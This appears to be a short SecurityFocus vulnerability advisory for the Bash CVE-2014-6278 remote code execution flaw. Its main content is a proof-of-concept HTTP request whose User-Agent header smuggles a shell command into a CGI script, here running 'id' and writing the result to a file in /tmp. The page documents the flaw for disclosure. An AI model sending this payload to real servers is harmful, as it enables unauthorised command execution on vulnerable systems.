GNU Bash CVE-2014-6278 Incomplete Fix Remote Code Execution Vulnerability

The following proof-of-concept and exploits are available:

GET /some/script.cgi HTTP/1.0
User-Agent: () { _; } >_[$($())] { id >/tmp/hi_mom;


 

Privacy Statement
Copyright 2010, SecurityFocus